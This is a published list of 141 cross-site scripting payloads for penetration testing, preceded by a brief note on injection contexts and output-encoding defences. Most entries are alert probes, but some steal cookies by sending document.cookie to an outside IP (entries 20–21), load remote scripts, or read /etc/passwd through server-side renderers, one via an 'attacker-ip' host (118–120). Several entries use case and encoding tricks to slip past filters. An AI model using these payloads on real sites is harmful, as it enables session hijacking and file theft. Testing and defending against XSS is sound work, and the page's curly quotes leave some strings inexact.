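XSS payload list

The entries below are test strings for different injection contexts: HTML body content (`<script>` and event-handler attributes on `img`, `svg`, `body`, `audio`, `iframe`), a quoted attribute value (entries that start with a quote followed by `>`), a JavaScript string literal (entries that start with a quote followed by `-` or `;`), a URL scheme (`javascript:`), an HTML comment (entries that start with a comment terminator), and a client-side template expression (`{{…}}`). Several entries vary only in letter case, nesting, or character encoding, so a filter that strips `<script>` once or matches tag names case-sensitively does not cover them. The control that covers these contexts together is context-aware output encoding, backed by a strict Content Security Policy. Entries 118–120 reference local file paths and appear aimed at server-side HTML renderers rather than browsers. The page's typography has replaced straight quotes and the double hyphen with curly quotes and an en dash, so the entries appear as published, not as literal strings.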

  1. <script>alert(1)</script>
  2. <Script>alert(1)</Script>
  3. <sCript>alert(document.domain)</sCript>
  4. <script>alert(123);</script>
  5. <script>alert(“test”);</script>
  6. <script>alert(document.cookie)</script>
  7. </script><script>alert(document.cookie)</script>
  8. javascript:alert(document.cookie)
  9. javascript:prompt(document.cookie)
  10. ‘-alert(document.cookie)-‘
  11. </script><svg onload=alert(document.cookie)>
  12. “onmouseover=alert(document.cookie)//
  13. {{$on.constructor(‘alert(1)’)()}}
  14. <Script>alert(document.cookie)</Script>
  15. <sCript>alert(document.domain)</sCript>
  16. <script>alert(document.cookie);</script>
  17. <script>alert(document.cookie);</script>
  18. <script>alert(document.domain)</script>
  19. <script>alert(document.cookie)</script>
  20. <script>new Image().src=”http://192.168.1.6/?c=”+document.cookie;</script>
  21. <script>var i=new Image; i.src=”http://192.168.1.6/?”+document.cookie;</script>
  22. </script><script>alert(1)</script>
  23. <img src=”abc” onerror=”alert(1)”>
  24. <img src=”” onerror=”alert(document.cookie)”>
  25. <img src=’x’ onerror=’alert(document.cookie)’ />
  26. &lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
  27. &lt;img src=0 onerror=alert(document.cookie)&gt;
  28. <svg/onload=alert(1)>
  29. “><svg onload=alert(1)>
  30. ‘;alert(‘1′);’
  31. ‘;alert(‘abc’);’
  32. <sc<script>ript>alert(1)</sc</script>ript>
  33. <BODY ONLOAD=alert(‘1’)>
  34. <marquee onstart=alert(1)></marquee>
  35. <audio src/onerror=alert(1)>
  36. <audio src/onerror=prompt(123)>
  37. <audio src/onerror=confirm(123)>
  38. <script src=”http://192.168.1.6/test.js” ></script>
  39. <body onload=alert(123) >
  40. <body onload=confirm(123) >
  41. <body onload=prompt(123) >
  42. –><svg/onload=alert(document.domain)>
  43. –><body onload=alert(123) >
  44. –><script>alert(1)</script>
  45. –><img src=x onerror=alert(‘test’)>
  46. –><img src=x onerror=alert(document.domain)>
  47. –><img src=x onerror=alert(document.cookie)>
  48. –><img src=x onerror=prompt(document.domain)>
  49. –><img src=x onerror=confirm(document.domain)>
  50. <iframe src=’https://testforiframe.site/’>
  51. “><iframe src=’https://testforiframe.site/’>
  52. “><script src=”https://testforiframe.site/”></script>
  53. “><script>alert(document.domain)</script>
  54. “><script>alert(document.domain + ‘\n’ + “1”)</script>
  55. “><script>alert(document.domain + ‘\n’ + “Name”)</script>
  56. “<img src=’x’ onerror=’alert(10)’ />”
  57. https://brutelogic.com.br/poc.svg
  58. http://xss.rocks/scriptlet.html
  59. javascript:alert(document.cookie)
  60. poc.svg = <svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.domain)”/>
  61. “><script>alert(1)</script>
  62. ‘or<script>alert(1)</script>
  63. ‘or<img src=0 onerror=alert(‘1’)>
  64. <script <script>>alert(‘test’)</script> 
  65. <audio src/onerror=alert(‘test’)>
  66. <iframe src=javascript:alert(‘test’)>
  67. <iframe src=”javascript:alert(test)”>
  68. <img src=x onerror=alert(test)>
  69. ‘;alert(test); //
  70. <body onmouseover=”print()”>
  71. <body onclick=print()>
  72. <body onmessage=print()>
  73. <iframe onload=print()></iframe>
  74. <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
  75. <IMG SRC=”javascript:alert(‘XSS’);”>
  76. <IMG SRC=javascript:alert(‘XSS’)>
  77. <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  78. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  79. <IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”\>
  80. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  81. <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
  82. <img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>
  83. <<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
  84. <iframe src=http://xss.rocks/scriptlet.html <
  85. </script><script>alert(document.cookie);</script>
  86. </TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
  87. <BODY ONLOAD=alert(document.cookie)>
  88. <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  89. <IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
  90. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.rocks/scriptlet.html”></OBJECT>
  91. <script>’-alert(1)-‘</script>
  92. ‘-alert(1)-‘
  93. ></select><img%20src=1%20onerror=alert(1)>
  94. {{$on.constructor(‘alert(1)’)()}}
  95. \”-alert(1)}//
  96. <img src=1 onerror=print()>
  97. “-top[‘al\x65rt’](‘sailay’)-“
  98. <pre id=p style=background:#000><svg onload=’setInterval(n=>{for(o=t++,i=476;i–;o+=i%30?(“0o”[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||”.”).fontcolor(c>2):”\n”);p.innerHTML=o},t=1)’>
  99. <img src=”” onerror=”innerHTML=decodeURIComponent.call`${location.hash}`” “=””>
  100. <img src=”” onerror=”location=/javascript:/.source+location” “=””>
  101. <img src=”” onerror=”window.onerror=alert;throw 1337″ “=””>
  102. <img src=”” onerror=”alert&1par;1337&rpar;” “=””>
  103. <img src=”” onerror=”alert`1337`” “=””>
  104. javascript:alert(document.cookie)
  105. “><img src=x onerror=alert(document.domain)>
  106. “><script>alert(1)</script>
  107. “><script>alert(document.domain)</script>
  108. “><script>alert(document.cookie)</script>
  109. “><script>prompt(1)</script>
  110. “><script>prompt(document.domain)</script>
  111. “><script>prompt(document.cookie)</script>
  112. “><svg><script>alert(1)</script>
  113. ?s=”onerror=”innerHTML=decodeURIComponet.call`${location.hash}`”#<img src onerror=alert(1337)>
  114. ?s=”onerror=”location=/javascript:/.source%2Blocation”&a=%0A+alert(1337)
  115. ?s=”onerror=”window.onerror=alert;throw 1337″
  116. ?s=”onerror=”alert%261par;1337%26rpar;”
  117. ?s=”onerror=”alert`1337`”
  118. <img src=”xxx” onerror=”document.write(‘\<iframe src=file:///etc/passwd>\</iframe>’)”/>
  119. <link rel=attachment href=”file:///etc/passwd”>
  120. <iframe src=”http://attacker-ip/test.php?file=/etc/passwd”>\</iframe>
  121. <IMG sRC=X onerror=jaVaScRipT:alert`xss`>
  122. %22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
  123. <svg  xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.cookie)”/>
  124. <svg><style> <script>alert(1)</script> </style></svg>
  125. <math><style> <img src onerror=alert(2)> </style></math>
  126. <script>window.location.assign(‘https://secure.eicar.org/eicar_com.zip’)</script>
  127. <body style=”background-color:red”>
  128. <body style=”background-color:red !important;”>
  129. <body onload=window.location.assign(‘https://www.google.com’)>
  130. alert(123)
  131. alert(“test”)
  132. alert(document.cookie)
  133. alert(document.domain)
  134. confirm(123)
  135. confirm(“test”)
  136. confirm(document.cookie)
  137. confirm(document.domain)
  138. prompt(123)
  139. prompt(“test”)
  140. prompt(document.cookie)
  141. prompt(document.domain)
